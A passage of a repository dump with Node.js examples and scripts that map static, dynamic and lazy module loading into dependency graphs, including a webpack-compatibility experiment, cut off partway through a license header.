    "./node_modules/diff/lib/patch/apply.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/patch/apply.js" -> "./node_modules/diff/lib/util/distance-iterator.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/merge.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/patch/create.js";
    "./node_modules/diff/lib/patch/create.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/util/array.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/create.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/convert/dmp.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/convert/xml.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/debug/src/index.js" -> "./node_modules/debug/src/node.js";
    "./node_modules/debug/src/node.js" -> "./node_modules/debug/src/debug.js";
    "./node_modules/debug/src/debug.js" -> "./node_modules/ms/index.js";
    "./node_modules/debug/src/node.js" -> "./node_modules/supports-color/index.js";
    "./node_modules/supports-color/index.js" -> "./node_modules/has-flag/index.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/glob/glob.js";
    "./node_modules/glob/glob.js" -> "./node_modules/fs.realpath/index.js";
    "./node_modules/fs.realpath/index.js" -> "./node_modules/fs.realpath/old.js";
    "./node_modules/glob/glob.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/minimatch/minimatch.js" -> "./node_modules/brace-expansion/index.js";
    "./node_modules/brace-expansion/index.js" -> "./node_modules/concat-map/index.js";
    "./node_modules/brace-expansion/index.js" -> "./node_modules/balanced-match/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/inherits/inherits.js";
    "./node_modules/glob/glob.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/glob/sync.js";
    "./node_modules/glob/sync.js" -> "./node_modules/fs.realpath/index.js";
    "./node_modules/glob/sync.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/glob/sync.js" -> "./node_modules/glob/glob.js";
    "./node_modules/glob/sync.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/sync.js" -> "./node_modules/glob/common.js";
    "./node_modules/glob/common.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/glob/common.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/glob/common.js";
    "./node_modules/glob/glob.js" -> "./node_modules/inflight/inflight.js";
    "./node_modules/inflight/inflight.js" -> "./node_modules/wrappy/wrappy.js";
    "./node_modules/inflight/inflight.js" -> "./node_modules/once/once.js";
    "./node_modules/once/once.js" -> "./node_modules/wrappy/wrappy.js";
    "./node_modules/glob/glob.js" -> "./node_modules/once/once.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/he/he.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/supports-color/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/dot.js";
    "./node_modules/mocha/lib/reporters/dot.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/dot.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/doc.js";
    "./node_modules/mocha/lib/reporters/doc.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/doc.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/tap.js";
    "./node_modules/mocha/lib/reporters/tap.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/json.js";
    "./node_modules/mocha/lib/reporters/json.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/html.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/browser/progress.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/escape-string-regexp/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/list.js";
    "./node_modules/mocha/lib/reporters/list.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/list.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/min.js";
    "./node_modules/mocha/lib/reporters/min.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/min.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/spec.js";
    "./node_modules/mocha/lib/reporters/spec.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/spec.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/nyan.js";
    "./node_modules/mocha/lib/reporters/nyan.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/nyan.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/xunit.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mkdirp/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/markdown.js";
    "./node_modules/mocha/lib/reporters/markdown.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/markdown.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/progress.js";
    "./node_modules/mocha/lib/reporters/progress.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/progress.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/landing.js";
    "./node_modules/mocha/lib/reporters/landing.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/landing.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/json-stream.js";
    "./node_modules/mocha/lib/reporters/json-stream.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/interfaces/index.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/bdd.js";
    "./node_modules/mocha/lib/interfaces/bdd.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/test.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/pending.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/test.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/tdd.js";
    "./node_modules/mocha/lib/interfaces/tdd.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/qunit.js";
    "./node_modules/mocha/lib/interfaces/qunit.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/exports.js";
    "./node_modules/mocha/lib/interfaces/exports.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/hook.js";
    "./node_modules/mocha/lib/hook.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/hook.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/interfaces/exports.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/context.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/runner.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/pending.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/hook.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/bin/options.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/lib/reporters/spec.js";
    "./node_modules/mocha/lib/interfaces/bdd.js" -> "./node_modules/mocha/lib/interfaces/common.js";
    "./node_modules/mocha/lib/interfaces/common.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/mocha.js" -> "./test/test.js";
    "./test/test.js" -> "./node_modules/chai/index.js";
    "./node_modules/chai/index.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/assertion-error/index.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/utils/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/pathval/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/test.js";
    "./node_modules/chai/lib/chai/utils/test.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/expectTypes.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/assertion-error/index.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getMessage.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/getActual.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/get-func-name/index.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/utils/getProperties.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/utils/getEnumerableProperties.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/objDisplay.js";
    "./node_modules/chai/lib/chai/utils/objDisplay.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/objDisplay.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getActual.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/objDisplay.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/deep-eql/index.js";
    "./node_modules/deep-eql/index.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/get-func-name/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addProperty.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/isProxyEnabled.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addMethod.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/addLengthGuard.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/getProperties.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteProperty.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteMethod.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addChainableMethod.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js";
    "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/compareByInspect.js";
    "./node_modules/chai/lib/chai/utils/compareByInspect.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerablePropertySymbols.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerableProperties.js";
    "./node_modules/chai/lib/chai/utils/getOwnEnumerableProperties.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerablePropertySymbols.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/check-error/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/isNaN.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/assertion.js";
    "./node_modules/chai/lib/chai/assertion.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/core/assertions.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/expect.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/should.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/assert.js";
    "./test/test.js" -> "./index.js";
    "./index.js" -> "./lib/static.js";
    "./index.js" -> "./lib/dynamic.js";
    "./index.js" -> "./lib/opt2.js";
    "./index.js" -> "./lib/lazy.js";
    "./package.json" -> "./index.js";
    "./package.json" [fillcolor=black,fontcolor=white,style=filled];
}


================================================
FILE: chapter-2/example/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// index.js
// Example that tests various kinds of loads.

let staticLoad = require('./lib/static');
function dynamicLoad(f, x) {
  return f('./lib/' + x);
}
dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
exports.lazyLoad = () => require('./lib/lazy');

// Fallback to alternatives
require(['./lib/opt1', './lib/opt2'].find(
    (name) => {
      try {
        require.resolve(name);
        return true;
      } catch (_) {
        return false;
      }
    }));


================================================
FILE: chapter-2/example/lib/dynamic.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/dynamic.js

exports.x = 'dynamic';


================================================
FILE: chapter-2/example/lib/lazy.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/lazy.js

exports.x = 'lazy';


================================================
FILE: chapter-2/example/lib/opt2.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/opt2.js

exports.x = 'opt2';


================================================
FILE: chapter-2/example/lib/static.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/static.js

exports.x = 'static';


================================================
FILE: chapter-2/example/make_dep_graph.sh
================================================
#!/bin/bash

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

set -e

cd "$(dirname "$0")"

mkdir -p graphs
(
    echo 'digraph Modules {'

    # Run the tests and filter the logs for log entries from our
    # hacked Module._load.
    # Also relativize source file paths.
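    # NODE_BUILD_DIR should name a node build whose Module._load has been
    # hacked as described above; it defaults to the original author's checkout.
    NODE_BUILD_DIR="${NODE_BUILD_DIR:-/Users/msamuel/work/node/out/Release}"
    NODE="$NODE_BUILD_DIR/node" \
    PATH="$NODE_BUILD_DIR/:$PATH" \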
    ./node_modules/.bin/mocha 2>&1 \
    | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'

    # Add an edge from package.json to the main module.
    echo '    "./package.json" -> "./index.js";'
    echo '    "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
    echo '}'
) > graphs/full.dot

python -c '
import re
import sys

EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
GRAPH_END_RE = re.compile(r"^ *\}")

edges = {}
def add_edge(src, tgt):
  tgts = edges.get(src)
  if tgts is None:
    tgts = []
    edges[src] = tgts
  tgts.append(tgt)

for line in sys.stdin:
  edges_match = EDGE_RE.match(line)
  if edges_match is not None:
    add_edge(edges_match.group(1), edges_match.group(2))
    continue
  elif GRAPH_END_RE.match(line):
    reachable = set()
    def find_reachable(src):
      if src not in reachable:
        reachable.add(src)
        for tgt in edges.get(src, ()):
          find_reachable(tgt)
    find_reachable("\"./package.json\"")
    reachable = list(reachable)
    reachable.sort()
    for src in reachable:
      for tgt in edges.get(src, ()):
        print("    %s -> %s;" % (src, tgt))
  sys.stdout.write(line)
' < graphs/full.dot > graphs/filtered.dot

for graph in full filtered; do
    dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
done

# Start walking from package.json


================================================
FILE: chapter-2/example/package.json
================================================
{
    "name": "dynamism-example",
    "private": true,
    "description": "Example code that shows dynamically walking the test graph",
    "main": "index.js",
    "scripts": {
        "test": "echo $NODE; ./node_modules/.bin/mocha"
    },
    "author": "Mike Samuel",
    "license": "Apache-2.0",
    "devDependencies": {
        "chai": ">=4.1.2",
        "mocha": ">=4.0.1"
    }
}


================================================
FILE: chapter-2/example/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// test/test.js

var expect = require("chai").expect;
var app = require("../index");

describe("My TestSuite", () => {
  describe("A test", () => {
    it("A unittest", () => {
      // Exercise the API
      app.lazyLoad();
    });
  });
});


================================================
FILE: chapter-2/experiments/webpack-compat/.gitignore
================================================
dist
node_modules

================================================
FILE: chapter-2/experiments/webpack-compat/goodbye.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.say = x => console.log(`Goodbye, ${x}!`);


================================================
FILE: chapter-2/experiments/webpack-compat/hello.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.say = x => console.log(`Hello, ${x}!`);


================================================
FILE: chapter-2/experiments/webpack-compat/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

var metadata = require('./package.json');
var greeting = require('./' + metadata.greeting);

greeting.say('World');


================================================
FILE: chapter-2/experiments/webpack-compat/package.json
================================================
{
  "name": "webpack-compat-experiment",
  "description": "Figuring out how well webpack deals with dynamic loads",
  "version": "0.0.0",
  "main": "index.js",
  "dependencies": {},
  "scripts": {},
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "greeting": "hello",
  "devDependencies": {
    "webpack": "^3.10.0"
  }
}


================================================
FILE: chapter-2/experiments/webpack-compat/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

console.log('test/test.js: NOT PRODUCTION CODE');


================================================
FILE: chapter-2/experiments/webpack-compat/test-utils.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
